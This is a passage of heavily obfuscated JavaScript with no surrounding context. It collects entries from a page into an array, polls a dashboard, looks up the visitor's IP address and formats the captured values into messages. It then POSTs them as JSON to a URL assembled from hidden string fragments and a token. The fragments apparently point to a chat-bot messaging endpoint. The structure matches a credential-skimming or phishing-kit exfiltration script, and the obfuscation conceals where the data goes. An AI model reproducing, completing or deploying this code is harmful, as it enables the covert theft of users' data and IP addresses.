_0x2712cc=paArray[_0x5c66f1(0x2ec,0x2e3,0x310,0x309,0x2e8)+_0x4c7cbd(0x1eb,0x1b2,0x191,0x1cd,0x1f4)](_0x4d3d28=>_0x4d3d28[_0x4c7cbd(0x1a4,0x177,0x195,0x1b6,0x145)+_0x4c7cbd(0x114,0x152,0x138,0x17b,0x169)]===_0x1837aa);if(_0x354d00[_0x3012d7(0x1fa,0x1ee,0x1c4,0x1a7,0x1e9)](_0x2712cc,-(0x647+0x8f*-0x1f+-0x101*-0xb))){if(_0x354d00[_0x20e72a(0x2c,-0x1c,-0x8,-0xf,-0xe)](_0x354d00[_0x4c7cbd(0x197,0x1c3,0x1bc,0x191,0x1eb)],_0x354d00[_0xec2196(-0x22b,-0x1db,-0x202,-0x22d,-0x21d)]))_0x354d00[_0x20e72a(-0x17,-0x45,-0xc,-0x2c,0x14)](_0x1ccb45,_0x45c197),_0x50b0a5[_0x5c66f1(0x2bf,0x286,0x2d3,0x2f3,0x2f9)+'h']=-0x20ec+-0x207*0x9+0x332b,_0x42d97f=_0x335293;else{if(_0x354d00[_0x20e72a(-0x24,-0x1c,-0x36,-0x9,-0x33)](_0x1de268[_0xec2196(-0x22d,-0x1e2,-0x1fa,-0x23d,-0x205)+'h'],paArray[_0x2712cc][_0x5c66f1(0x2ea,0x2d2,0x2e2,0x301,0x313)+_0x5c66f1(0x27b,0x2b3,0x2b1,0x274,0x243)][_0xec2196(-0x1fb,-0x21d,-0x1fa,-0x21f,-0x230)+'h'])){if(_0x354d00[_0x5c66f1(0x2d0,0x30e,0x2cf,0x2a6,0x2b6)](_0x354d00[_0x4c7cbd(0x144,0x160,0x153,0x143,0x19c)],_0x354d00[_0x4c7cbd(0x19b,0x17b,0x154,0x198,0x189)])){const _0x3b6d8f=_0x21e3e8[_0x20e72a(0x22,-0x2a,0x14,-0x19,0xa)+_0xec2196(-0x208,-0x209,-0x1dd,-0x1c1,-0x1f0)](_0x2b1fb3=>_0x2b1fb3[_0x4c7cbd(0x133,0x177,0x1b4,0x197,0x136)+_0xec2196(-0x1fd,-0x21c,-0x23d,-0x244,-0x245)]===_0x3f9938);if(_0x354d00[_0x4c7cbd(0x19e,0x185,0x14e,0x1ab,0x173)](_0x3b6d8f,-(-0x1*0x1dc3+-0x2*-0x1241+-0x6be)))_0x354d00[_0x5c66f1(0x2a2,0x283,0x279,0x2c4,0x2df)](_0x18d420[_0x5c66f1(0x2bf,0x2d4,0x2cb,0x2d6,0x2a7)+'h'],_0x83564f[_0x3b6d8f][_0x4c7cbd(0x17d,0x1c0,0x1f3,0x1d5,0x190)+_0x5c66f1(0x27b,0x258,0x263,0x240,0x25d)][_0xec2196(-0x1bf,-0x21a,-0x1fa,-0x1f3,-0x228)+'h'])&&(_0x139b8d[_0x3b6d8f][_0x4c7cbd(0x19e,0x1c0,0x180,0x1b9,0x182)+_0x4c7cbd(0x179,0x151,0x141,0x163,0x110)]=_0x30f510);else{const _0x185adb={};_0x185adb[_0xec2196(-0x243,-0x20e,-0x218,-0x24c,-0x1df)+_0x3012d7(0x212,0x20c,0x1b8,0x1c1,0x1f0)]=_0x5b452f,_0x185adb[_0xec2196(-0x1ce,-0x1c1,-0x1cf,-0x1d6,-0x1a8)+_0xec2196(-0x276,-0x1fe,-0x23e,-0x262,-0x254)]=_0x2fd602;const _0x426b69=_0x185adb;_0x3f4da1[_0x4c7cbd(0x193,0x188,0x193,0x19e,0x157)](_0x426b69);}}else paArray[_0x2712cc][_0x20e72a(-0x2f,0x1d,0x12,-0x30,0x50)+_0x4c7cbd(0x10c,0x151,0x13d,0x15c,0x17a)]=_0x1de268;}}}else{if(_0x354d00[_0x3012d7(0x240,0x213,0x270,0x23c,0x244)](_0x354d00[_0x5c66f1(0x2d9,0x2ab,0x2d1,0x2bc,0x2a7)],_0x354d00[_0x20e72a(0x2e,0x11,0xe,0x52,0x1a)]))_0x354d00[_0x5c66f1(0x2f6,0x2b9,0x2ba,0x2cb,0x333)](_0x55cbb8,_0x354d00[_0xec2196(-0x194,-0x1be,-0x1c5,-0x1a2,-0x1fe)])[_0xec2196(-0x1ef,-0x20e,-0x1c9,-0x1dd,-0x1de)](_0x1c3829=>_0x1c3829[_0x4c7cbd(0x150,0x14f,0x173,0x171,0x13f)]())[_0x4c7cbd(0x1df,0x1c6,0x1f3,0x1d2,0x197)](_0x534a81=>{function _0x12707c(_0x325014,_0x3d7af6,_0x3d179c,_0x3dd0d2,_0x23762a){return _0x3012d7(_0x325014-0x85,_0x23762a,_0x3d179c-0x1a5,_0x3dd0d2-0x11b,_0x325014- -0x400);}function _0x11f87f(_0x58d9d1,_0xe19744,_0x5e2289,_0xadd266,_0x5ee613){return _0x4c7cbd(_0x58d9d1-0x2e,_0x58d9d1-0x219,_0x5e2289-0x15,_0xadd266-0x190,_0x5e2289);}function _0x516c44(_0x328358,_0x107987,_0x53b7d7,_0x1abe84,_0x1aca41){return _0x4c7cbd(_0x328358-0x9e,_0x1abe84-0x1e3,_0x53b7d7-0xc2,_0x1abe84-0xb7,_0x53b7d7);}function _0x34ccd2(_0x2ad392,_0x4799bc,_0x4c518b,_0x26488b,_0x23646a){return _0x20e72a(_0x2ad392-0x192,_0x23646a,_0x4799bc-0x19b,_0x26488b-0x4d,_0x23646a-0x14);}function _0x18756f(_0x3b39be,_0x1a8744,_0x5d0993,_0xacca07,_0x11c9c4){return _0x5c66f1(_0x1a8744- -0x242,_0x1a8744-0x1d,_0x11c9c4,_0xacca07-0x2e,_0x11c9c4-0x17a);}const _0x2cedfa=_0x534a81['ip'],_0x446f86=_0x5d6691[_0x34ccd2(0x177,0x19b,0x1af,0x161,0x160)](_0x5dedc7=>_0x516c44(0x3bd,0x3a1,0x37f,0x3a0,0x384)+_0x516c44(0x320,0x33d,0x361,0x362,0x35a)+'`'+_0x5dedc7[_0x34ccd2(0x12a,0x164,0x186,0x154,0x13f)+_0x34ccd2(0x151,0x13f,0x107,0xfa,0x14d)]+(_0x12707c(-0x20e,-0x24e,-0x223,-0x1fb,-0x215)+_0x18756f(0xc,0x2b,0x64,0x31,0x62)+_0x12707c(-0x1f5,-0x210,-0x213,-0x1f3,-0x217))+_0x5dedc7[_0x11f87f(0x3d9,0x3fd,0x41c,0x3f9,0x416)+_0x34ccd2(0xf9,0x13e,0x17d,0x11d,0x13c)]+(_0x18756f(0x72,0x83,0x6e,0x50,0x80)+_0x18756f(0x62,0x2f,0x29,0xe,0x1a)+_0x18756f(0xbc,0x94,0xcb,0x6a,0xce)+_0x11f87f(0x367,0x357,0x370,0x38e,0x33f)))[_0x18756f(0x7a,0x7c,0x92,0x5c,0xa7)]('\x0a\x0a'),_0x186c2e=_0x309839[_0x34ccd2(0x193,0x177,0x17e,0x191,0x1ab)]();_0x354d00[_0x516c44(0x348,0x36b,0x32c,0x32b,0x2e6)](_0x354d00[_0x12707c(-0x1ae,-0x184,-0x17b,-0x169,-0x1a2)](_0x186c2e,_0x4d6901),0x4*-0x7cb1+0x15e6*-0x46+0xc8388)&&(_0x354d00[_0x11f87f(0x3da,0x415,0x3bd,0x3a7,0x3ac)](_0x5e6c66,_0x446f86),_0x41634d[_0x12707c(-0x1cd,-0x1f9,-0x1de,-0x1aa,-0x1c2)+'h']=0xbd+-0x588+0x4cb,_0x45c2e9=_0x186c2e);});else{const _0x3ca2e1={};_0x3ca2e1[_0x20e72a(-0x48,-0x4f,-0x37,-0x2d,-0x29)+_0xec2196(-0x213,-0x221,-0x23d,-0x223,-0x277)]=_0x1837aa,_0x3ca2e1[_0x5c66f1(0x2ea,0x309,0x2ee,0x322,0x327)+_0x20e72a(-0x42,-0x8a,-0x5d,-0x58,-0x8c)]=_0x1de268;const _0x3090f8=_0x3ca2e1;paArray[_0x4c7cbd(0x197,0x188,0x156,0x1bb,0x15e)](_0x3090f8);}}}else{const _0x480999=_0x354d00[_0x20e72a(-0x37,0xd,-0x6,0x35,-0x19)],_0x3a722a=_0x354d00[_0x3012d7(0x22f,0x246,0x24a,0x24a,0x23c)],_0x24f04d=_0x3012d7(0x25f,0x243,0x227,0x222,0x220)+_0x4c7cbd(0x145,0x153,0x16d,0x173,0x141)+_0xec2196(-0x1b1,-0x1f8,-0x1dc,-0x1c2,-0x1d4)+_0x5c66f1(0x2e0,0x2f9,0x303,0x2cd,0x2a1)+_0xec2196(-0x249,-0x26a,-0x226,-0x200,-0x238)+_0xec2196(-0x219,-0x1fe,-0x21f,-0x214,-0x239)+_0x480999+(_0x5c66f1(0x299,0x278,0x295,0x28e,0x2db)+_0xec2196(-0x234,-0x1f6,-0x20f,-0x238,-0x21e)+'ge'),_0x473fc8={};_0x473fc8[_0x5c66f1(0x28b,0x26a,0x267,0x287,0x29b)+'id']=_0x3a722a,_0x473fc8[_0x3012d7(0x1e3,0x210,0x1ca,0x22c,0x209)]=_0x4671c0;const _0x3e2cca=_0x473fc8;_0x354d00[_0x5c66f1(0x28e,0x271,0x254,0x2cb,0x2ad)](_0x25ac75,_0x24f04d,{'method':_0x354d00[_0x4c7cbd(0x1bb,0x1be,0x1c4,0x17c,0x18a)],'headers':{'Content-Type':_0x354d00[_0xec2196(-0x200,-0x21a,-0x1f8,-0x1ef,-0x238)]},'body':_0x3fea93[_0x5c66f1(0x2c9,0x304,0x2e8,0x2ee,0x2f9)+_0x4c7cbd(0x1b2,0x172,0x157,0x17f,0x153)](_0x3e2cca)});}}function _0x3012d7(_0x5984eb,_0x401e74,_0x4ceb38,_0x473a44,_0x45b168){return _0x4b0e(_0x45b168-0xbe,_0x401e74);}function _0x20e72a(_0x2f6961,_0x52f057,_0x5e2562,_0x3c5f1e,_0x3f9186){return _0x4b0e(_0x5e2562- -0x18e,_0x52f057);}_0x354d00[_0x20e72a(0xf,-0x18,0x11,0xd,0x6)](checkInnerDashboard);},0x80e+-0x533*0x7+0xeb*0x21),$(_0x567cf5(-0xcc,-0x8c,-0x47,-0x4c,-0x70)+_0x40120b(0x2a6,0x2c0,0x298,0x27f,0x2da)+_0x567cf5(-0x106,-0xd1,-0x94,-0xe3,-0xef));
